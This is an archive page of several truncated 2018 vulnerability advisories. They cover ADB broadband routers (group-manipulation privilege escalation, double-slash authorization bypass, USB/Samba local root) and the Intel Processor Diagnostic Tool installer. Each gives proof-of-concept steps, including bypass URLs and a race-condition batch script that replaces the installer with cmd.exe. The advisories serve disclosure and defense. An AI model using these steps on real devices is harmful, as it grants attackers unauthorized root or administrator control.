SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab 
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
  title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13110
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-07-11
 by: Stefan Viehböck (Office Vienna)
 Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the group manipulation vulnerability on affected and unpatched
devices an attacker is able to gain access to the command line interface (CLI)
if previously disabled by the ISP.

Depending on the feature-set of the CLI (ISP dependent) it is then possible to
gain access to the whole configuration and manipulate settings in the web GUI
and escalate privileges to highest access rights.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to
gain access to the CLI (if it has been previously disabled by the configuration)
and escalate his privileges.

Depending on the CLI features it is possible to extract the whole configuration
and manipulate settings or gain access to debug features of the device, e.g.
via "debug", "upgrade", "upload" etc. commands in the CLI.

Attackers can gain access to sensitive configuration data such as VoIP
credentials or other information and manipulate any settings of the device.


Proof of concept:
-
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and
overwrite the local linux groups called "remoteaccess" or "localaccess" in
(in /etc/group) which define access to Telnet or SSH on the ADB devices.

It may be possible to overwrite the "root" group as well but it may brick the
device and the default user is already within the "root" group. Hence this
attack has not been further tested.

The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
 http://$IP/ui/dboard/storage/storageusers?backto=storage

   This will generate the following new group in /etc/group. The original
   "localaccess" group will overwritten.

   localaccess:Storage Group:5001:

b) Then delete this group via the web GUI again, the entry will be removed
   from /etc/group completely.

c) Afterwards, create the following new group name entry via the web GUI and
   add your user account (e.g. admin) wh

SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab 
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
  title: Authorization Bypass
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13109
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-28
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.

An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI, any further subsequent layers/paths (sub menus) were not possible to access
during testing but further exploitation can't be ruled out entirely.


Proof of concept:
-
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver

Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver

This works for many other settings within the web GUI!


In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp

Nevertheless, it can't be ruled out that sub menus can be accessed too when
further deeper tests are being performed.


Vulnerable / tested versions:
-
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV4202N - E_

SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab 
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
  title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13108
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-09
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.

Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.

The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation and samba
configuration file parsing problem which makes it possible to access the root
file system of the device with root access rights via a manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.


This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite p

[CVE-2018-3667, CVE-2018-3668] Escalation of priviilege via executable installer of Intel Processor Diagnostic Tool

2018-07-04 Thread Stefan Kanthak 
Hi @ll,

the executable installers of Intel's Processor Diagnostic Tool
(IPDT) before v4.1.0.27 have three vulnerabilities^Wbeginner's
errors which all allow arbitrary code execution with escalation
of privilege, plus a fourth which allows denial of service.

Intel published advisory SA-00140

on 2018-06-27 and updated installers on 2018-05-18.


The vulnerabilities can be exploited in standard installations
of Windows where the user^WUAC-"protected administrator" account
created during Windows setup is used, without elevation.
This precondition holds for the majority of Windows installations:
according to Microsoft's own security intelligence reports
, about 1/2 to 3/4 of the
about 600 million Windows installations which send telemetry data
have only ONE active user account.


#1 Denial of service through insecure file permissions
==

   The downloadable executable installer (really: executable
   self-extractor built with WinZIP) IPDT_Installer_4.1.0.24.exe
   creates a subdirectory with random name in %TEMP%, copies
   itself into this subdirectory and then executes its copy.

   The subdirectory inherits the NTFS ACLs from its parent
   %TEMP%, and so does the copy of the executable self-extractor.

   For this well-known and well-documented vulnerability see
    and
    plus
   


   Proof of concept/demonstration:
   ~~~

   1. download IPDT_Installer_4.1.0.24.exe (quite some clueless
  copycats still offer it, violating Intel's copyright;
  )
  and save it in your "Downloads" directory";

   2. add the NTFS access control list entry (D;OIIO;WP;;;WD)
  meaning "deny execution of files in this directory for
  everyone, inheritable to files in all subdirectories"
  to the (user's) %TEMP% directory.

   3. execute IPDT_Installer_4.1.024.exe: notice the complete
  failure of the executable installer^Wself-extractor,
  WITHOUT error message!


#2 Escalation of privilege through insecure file permissions


   Although the (copy of the) executable self-extractor runs with
   administrative privileges (its embedded "application manifest"
   specifies 'requireAdministrator'), it extracts its payload, the
   REAL installers setup.exe and setup64.exe, plus the batch script
   setup.bat, UNPROTECTED into the user's %TEMP% directory, CD's
   into %TEMP% and finally executes the extracted batch script
   %TEMP%\setup.bat:

   --- setup.bat ---
   echo off

   ver | findstr 6.1.7600
   if %errorlevel%==0 goto WinUnsup

   ver | findstr 6.0.6001
   if %errorlevel%==0 goto WinUnsup

   if "%programfiles(x86)%XXX"=="XXX" goto 32BIT

   :64BIT
   setup64.exe
   goto END

   :32BIT
   setup.exe
   goto END

   :WinUnsup
   echo Intel Processor Diagnostic Tool cannot be installed on this Operating 
System
   echo Please go to Online support page to view list of supported Oerating 
Systems

   pause

   :END
   exit 0
   --- EOF ---

   The extracted files inherit the NTFS ACLs from their parent
   %TEMP%, allowing "full access" for the unprivileged (owning)
   user, who can replace/overwrite the files between their creation
   and execution.

   Since the files are executed with administrative privileges,
   this vulnerability results in arbitrary code execution with
   escalation of privilege.


   Proof of concept/demonstration:
   ~~~

   1. create the following batch script in an arbitrary directory:

  --- IPDT.CMD ---
  :LOOP1
  @If Not Exist "%TEMP%\setup.exe" Goto :LOOP1

  Echo >"%TEMP%\setup.bat" WhoAMI.exe /all
  Echo >>"%TEMP%\setup.bat" Pause

  :LOOP2
  @If Not Exist "%TEMP%\setup64.exe" Goto :LOOP2

  Copy /Y %COMSPEC% "%TEMP%\setup.exe"

  :LOOP3
  @Copy %COMSPEC% "%TEMP%\setup64.exe"
  @If ERRORLEVEL 1 Goto :LOOP3
  --- EOF ---

   NOTE: the batch script needs to win a race (which it almost
 always will, due to the size of the files extracted).

   2. execute the batch script per double-click;

   3. execute IPDT_Installer_4.1.024.exe per double-click: notice
  the command processor started instead one of the executable
  installers, running with administrative privileges.


#3 Escalation of privilege through unsafe search path
=

   In Windows Vista and newer versions, the current working
   directory can be removed from the executable search path:
   

   The batch script setup.bat calls setup.exe